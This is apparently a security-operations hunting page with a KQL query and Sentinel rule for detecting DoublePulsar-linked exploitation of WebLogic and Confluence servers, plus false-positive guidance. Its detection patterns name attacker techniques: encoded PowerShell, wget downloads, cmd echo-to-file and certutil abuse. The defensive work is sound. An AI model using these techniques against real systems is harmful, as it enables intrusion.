detect-web-server-exploit-doublepulsar

Hunt Hypothesis

The Doublepulsar backdoor, associated with NSA-developed malware, may be used by adversaries to establish persistent remote access and exfiltrate data from compromised web servers. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential advanced persistent threats and mitigate data exfiltration risks.

KQL Query

DeviceProcessEvents
| where Timestamp >= ago(7d)
| where
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe" or
InitiatingProcessFileName == "beasvc.exe"
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
    FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
    // Omit known clean processes
    and ProcessCommandLine !startswith "POWERSHELL.EXE  -C \"GET-WMIOBJECT -COMPUTERNAME"
    and ProcessCommandLine !contains "ApplicationNo"
    and ProcessCommandLine !contains "CustomerGroup"
    and ProcessCommandLine !contains "Cosmos"
    and ProcessCommandLine !contains "Unrestricted"
    and
    (
        ProcessCommandLine contains "$" // PowerShell variable declaration
        or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
        or ProcessCommandLine contains "encodedcommand"
        or ProcessCommandLine contains "wget"
        //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
    )
)
or
(
    FileName =~ "cmd.exe" // cmd.exe is spawned
    and ProcessCommandLine contains "@echo" and
    ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
    FileName =~ "certutil.exe" // CertUtil.exe abuse
    and ProcessCommandLine contains "-split"
    // the "-split" parameter is required to write files to the disk
)
| project
       Timestamp,
       InitiatingProcessCreationTime ,
       DeviceId ,
       Grandparent_PID = InitiatingProcessParentId,
       Grandparent = InitiatingProcessParentFileName,
       Parent_Account = InitiatingProcessAccountName,
       Parent_PID = InitiatingProcessId,
       Parent = InitiatingProcessFileName ,
       Parent_Commandline = InitiatingProcessCommandLine,
       Child_PID = ProcessId,
       Child = FileName ,
       Child_Commandline = ProcessCommandLine

Analytic Rule Definition

id: da3b2b82-74a0-4b0e-8ef7-ac43515b4c70
name: detect-web-server-exploit-doublepulsar
description: |
  This query was originally published in the threat analytics report, Motivated miners.
  Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now used by many malicious actors. Software patches are available.
  The following query detects activity broadly associated with campaigns that use DoublePulsar to exploit web servers.
  See Detect DoublePulsar execution for a query that detects possible DoublePulsar execution events.
  References:
  https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoublePulsar&threatId=-2147239036
  https://www.scmagazine.com/home/security-news/cybercrime/doublepulsar-malware-spreading-rapidly-in-the-wild-following-shadow-brokers-dump/
  https://support.microsoft.com/help/4013389/title
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
tactics:
- Execution
query: |
  DeviceProcessEvents
  | where Timestamp >= ago(7d)
  | where
  // "Grandparent" process is Oracle WebLogic or some process loading Confluence
  InitiatingProcessParentFileName == "beasvc.exe" or
  InitiatingProcessFileName == "beasvc.exe"
  or InitiatingProcessCommandLine contains "//confluence"
  // Calculate for Base64 in Commandline
  | extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
  Total = countof(ProcessCommandLine, ".", "regex")
  | extend Ratio = todouble(Caps) / todouble(Total)
  | where
  (
      FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
      // Omit known clean processes
      and ProcessCommandLine !startswith "POWERSHELL.EXE  -C \"GET-WMIOBJECT -COMPUTERNAME"
      and ProcessCommandLine !contains "ApplicationNo"
      and ProcessCommandLine !contains "CustomerGroup"
      and ProcessCommandLine !contains "Cosmos"
      and ProcessCommandLine !contains "Unrestricted"
      and
      (
          ProcessCommandLine contains "$" // PowerShell variable declaration
          or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
          or ProcessCommandLine contains "encodedcommand"
          or ProcessCommandLine contains "wget"
          //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
      )
  )
  or
  (
      FileName =~ "cmd.exe" // cmd.exe is spawned
      and ProcessCommandLine contains "@echo" and
      ProcessCommandLine contains ">" // Echoing commands into a file
  )
  or
  (
      FileName =~ "certutil.exe" // CertUtil.exe abuse
      and ProcessCommandLine contains "-split"
      // the "-split" parameter is required to write files to the disk
  )
  | project
         Timestamp,
         InitiatingProcessCreationTime ,
         DeviceId ,
         Grandparent_PID = InitiatingProcessParentId,
         Grandparent = InitiatingProcessParentFileName,
         Parent_Account = InitiatingProcessAccountNam

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

MITRE ATT&CK Context

Tactic: Execution

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Execution/detect-web-server-exploit-doublepulsar.yaml)

False Positive Guidance

Scenario: Legitimate scheduled system backup using Windows Server Backup Tool
Filter/Exclusion: Check for ProcessName = "wbadmin.exe" and CommandLine contains "backup", and ensure the backup path is within the organization’s sanctioned backup directories.
Scenario: Admin performing remote PowerShell remoting to manage servers
Filter/Exclusion: Filter out PowerShell remoting sessions (ProcessName = "powershell.exe") where the command line includes -Command or -File and the script path is within the enterprise’s allowed PowerShell script repository.
Scenario: Scheduled job running a legitimate security tool like Microsoft Defender for Endpoint
Filter/Exclusion: Exclude processes with ProcessName = "MsMpEng.exe" or ProcessName = "WindowsDefender.exe" and verify the command line includes known defender-related tasks or scheduled scan commands.
Scenario: Internal development team deploying a custom web server module using IIS Manager
Filter/Exclusion: Filter out activities involving ProcessName = "iisexpress.exe" or ProcessName = "inetmgr.exe" and check for known internal development tools or paths within the organization’s development environment.
Scenario: IT team performing a patch deployment using Microsoft System Center Configuration Manager (SCCM)
Filter/Exclusion: Exclude processes with ProcessName = "ccmexec.exe" or ProcessName = "smsts.exe" and verify the deployment is associated with a known patching task or update schedule.